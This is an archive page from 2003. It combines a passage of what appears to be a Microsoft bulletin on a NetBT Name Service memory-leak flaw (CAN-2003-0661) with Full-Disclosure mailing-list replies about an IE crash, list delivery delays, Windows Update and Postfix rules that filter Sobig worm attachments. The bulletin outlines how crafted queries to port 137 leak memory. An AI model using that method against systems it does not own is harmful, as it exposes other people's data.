(NetBIOS over TCP) services, namely, the NetBIOS Name Service (NBNS). NBNS is analogous to DNS in the TCP/IP world and it provides a way to find a system.s IP address given its NetBIOS name, or vice versa. Under certain conditions, the response to a NetBT Name Service query may, in addition to the typical reply, contain random data from the target system.s memory. This data could, for example, be a segment of HTML if the user on the target system was using an Internet browser, or it could contain other types of data that exist in memory at the time that the target system responds to the NetBT Name Service query. An attacker could seek to exploit this vulnerability by sending a NetBT Name Service query to the target system and then examine the response to see if it included any random data from that system.s memory. If best security practices have been followed and port 137 UDP has been blocked at the firewall, Internet based attacks would not be possible. Mitigating factors: Any information disclosure would be completely random. By default, the Internet Connection Firewall (ICF), which is available with Windows XP and Windows Server 2003, blocks the ports that are used by NetBT. To exploit this vulnerability, an attacker would have to be able to send a specially-crafted NetBT request to port 137 on the target system and then examine the response to see whether any random data from that system.s memory is included. In intranet environments, these ports are usually accessible, but systems that are connected to the Internet usually have these ports blocked by a firewall. Severity Rating: Windows NT 4.0 Server Low Windows NT 4.0, Terminal Server Edition Low Windows 2000 Low Windows XP Low Windows Server 2003 Low The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them. Vulnerability identifier: CAN-2003-0661 Tested Versions: Microsoft tested Windows NT 4.0 Server, Windows NT 4.0 Terminal Server Edition, Windows 2000, Windows Millennium Edition, Windows XP, and Windows Server 2003 to assess whether they are affected by this vulnerability. Previous versions are no longer supported, and may or may not be affected by these vulnerabilities. Frequently asked questions What.s the scope of the vulnerability? This is an Information Disclosure vulnerability that could enable an attacker to receive arbitrary or random data from the memory of another computer system that is on a network. Under certain conditions, the response to a NetBT Name Service query may, in addition to the normal reply, contain random data from the target system.s memory. This data could, for example, be a segment of HTML if the user on the target system were using an Internet browser at the time that the target system responds to the NetBT Name Service query. It could also contain other types of data, depending on what data exists in memory at the time that the target system responds to the NetBT Name Service query. To exploit the vulnerability, the attacker must be able to access the target system over NetBT. The potential information disclosure cannot be directed or controlled. Any data that an attacker might receive would be very arbitrary in its nature because the information disclosure is limited to random segments of data that are in memory. An attacker could increase the probability of this memory disclosure by repeatedly sending NetBT Name Service queries
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
On Tue, Sep 02, 2003 at 09:12:10AM +0200, Marc Ruef wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear List I was looking for some sources that serve translations of Buce Schneiers well-known Crypto-Gram[1]. So I found on the official page the hint, that there are some outdated Issues in a german version available. After clicking in the link that brings me to http://www.galad.com/extras/cg/cg.htm , my Internet Explorer 6.0.2800.1106 encounters a problem and needs to close. After a bit of debugging I could determine that the problem must be existing in the library mshtml.dll. I tried to do a small and dirty analysis of the problem. So I fetched the whole page that encounters the error, but I couldn't reproduce the program shutdown with the offline version. It doesn't matter if I keep the original linking and embedded pictures as a link to the original web source. It worked fine for me, running IE 6.0 with the latest patches on Win 2000. Maybe just because you don't have the latest patches on your computer. PS: for the admin of this list, it seems that it's time to switch to faster Mail Transport Agent like Postfix or qmail. See the difference between the email from this person received on my two different mail accounts. Seems interesting.: Tue, 2 Sep 2003 01:35:41 -0600 Tue, 2 Sep 2003 01:52:52 -0600 (MDT) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
On Tue, Sep 02, 2003 at 01:56:24AM -0600, Irwan Hadi wrote: PS: for the admin of this list, it seems that it's time to switch to faster Mail Transport Agent like Postfix or qmail. See the difference between the email from this person received on my two different mail accounts. Seems interesting.: Tue, 2 Sep 2003 01:35:41 -0600 Tue, 2 Sep 2003 01:52:52 -0600 (MDT) Even more interesting: Received: from netsys.com (NETSYS.COM [199.201.233.10]) by phxby.engr.usu.edu (Postfix) with ESMTP id 4A3F11443EF for [EMAIL PROTECTED]; Tue, 2 Sep 2003 02:44:14 -0600 (MDT) Received: from NETSYS.COM (localhost [127.0.0.1]) by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827wOx20101; Tue, 2 Sep 2003 03:58:24 -0400 (EDT) Received: from phxby.engr.usu.edu (phxby.engr.usu.edu [129.123.21.101]) by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827uUE19665 for [EMAIL PROTECTED]; Tue, 2 Sep 2003 03:56:30 -0400 (EDT) Received: by phxby.engr.usu.edu (Postfix, from userid 501) id 6607B14438C; Tue, 2 Sep 2003 01:56:24 -0600 (MDT) I believe that for infosec stuffs, the faster information being distributed/sent is the better. Late putting patch just because the information come almost 1 hour later after it is sent might be catastropic. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
On Tue, Sep 02, 2003 at 10:47:48AM +0200, Marc Ruef wrote: Well, I am very sure, that I installed all available (security) patches for my Windows XP Professional and the Microsoft Internet Explorer 6.0 (checked windowsupdate.com a few minutes ago). Please check that you clicked the link and not did copy and paste (see Donnies reply and my response). I tried both, more than 8 times, reload the page more than 10 times, and none affect my IE. This is my mshtml.dll: 07/13/2003 04:02p 2,793,472 MSHTML.DLL Version: 6.0.2800.1226 O/S: Win2K + SP4, English. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
On Tue, Sep 02, 2003 at 10:42:58AM -0700, Tim wrote: I don't know about catastrophic, but it certainly should be faster. I personally find the speed of this list unacceptable. For large lists with high volume, a list server written in a scripting language like python isn't going to cut it, IMHO. I vote for qmail w/ ezmlm(-idx). (That is, if we get a vote in the matter.) List with thousands of subcribers and use EZMLM + qmail that uses single recipient delivery? huh, the server may need at least a dual DS3 to spit out those emails in time. Mailman+Python in this case is fine, the problem is just the old slow insecure Sendmail. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?
I've just visited http://windowsupdate.microsoft.com to update my Windows 2000 Server and Advanced Server, and I got this everytime I went there (with latest IE 6.0, etc. I just want to get the last IE and MDAC updates): http://v4.windowsupdate.microsoft.com/en/thanks.asp Thank you for your interest in Windows Update Windows Update is the online extension of Windows that helps you get the most out of your computer. The latest version of Windows Update is available on computers that are running Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium Edition, Windows 2000 (except Windows 2000 Datacenter Server), Windows XP, and the Windows Server 2003 family. = When I tried to open windowsupdate from my Windows 2000 Professional box, it works fine. Now are the Windows 2000 server families can't use windowsupdate anymore or what? I think Microsoft should give the server families higher priority than the desktop family since if the server is down, there are more desktops can't access the things they need to do, then if one desktop is down!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?
On Sun, Aug 24, 2003 at 02:59:51AM -0600, Irwan Hadi wrote: I've just visited http://windowsupdate.microsoft.com to update my Windows 2000 Server and Advanced Server, and I got this everytime I went there (with latest IE 6.0, etc. I just want to get the last IE and MDAC updates): http://v4.windowsupdate.microsoft.com/en/thanks.asp Thank you for your interest in Windows Update Windows Update is the online extension of Windows that helps you get the most out of your computer. The latest version of Windows Update is available on computers that are running Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium Edition, Windows 2000 (except Windows 2000 Datacenter Server), Windows XP, and the Windows Server 2003 family. = It seems they were down. A few more minutes later, I can run windowsupdate again. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Is this caused by Sobig?
On Sat, Aug 23, 2003 at 10:45:56AM +1000, gregh wrote: See attached text file. As many of you are, so am I being pinged quite a lot. So, I checked out a few of the pings and I am getting this same thing each time. Is this an effect of Sobig? I hadn't noticed anything quite like this before a few weeks ago. If the ports that open look that many, then usually that means that box has a firewall in front of it. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Idea
On Thu, Aug 21, 2003 at 11:12:06AM -0700, D B wrote: i have always had an idea but never any place to try it i would like people with experience to tell me what they think of it assuming a unix / linux operating system as a server install the services get them configured ...remove all booting hardware except the drive then change the roots shell to /bin/false and and remove all working shells from the OS to configure or modify things one would have to install boot hardware and then use other boot media containing a shell only problem is ...i dont know of anything service wise that requires little to no modification on a regular basis firewall ...router ?...ftp server ? k ...flame on Put firewall, router, ftp, etc. but just don't connect it to any network, and you'll be safe. Anyhow, how are you going to update the box remote, in case you need to do ASAP if you can't even login into it?? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Filtering sobig with postfix
On Fri, Aug 22, 2003 at 08:43:45AM +1200, Bojan Zdrnja wrote: /filename=.*(your_details|your_document|document_all).pif/ REJECT You might want to reject all .pif files, and also: /(Virus found|VIRUS ALERT)/ DISCARD To discard all those messages originating from improperly configured MTA's, which were able to detect Sobig-F, but which still send notification to faked from: address. After you edit that file just issue: # /usr/sbin/postmap /etc/postfix/header_checks you don't need to postmap the header checks file, because you are using regexp. You *only* need to postmap it, if you use hash:, dbm: or btree: ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
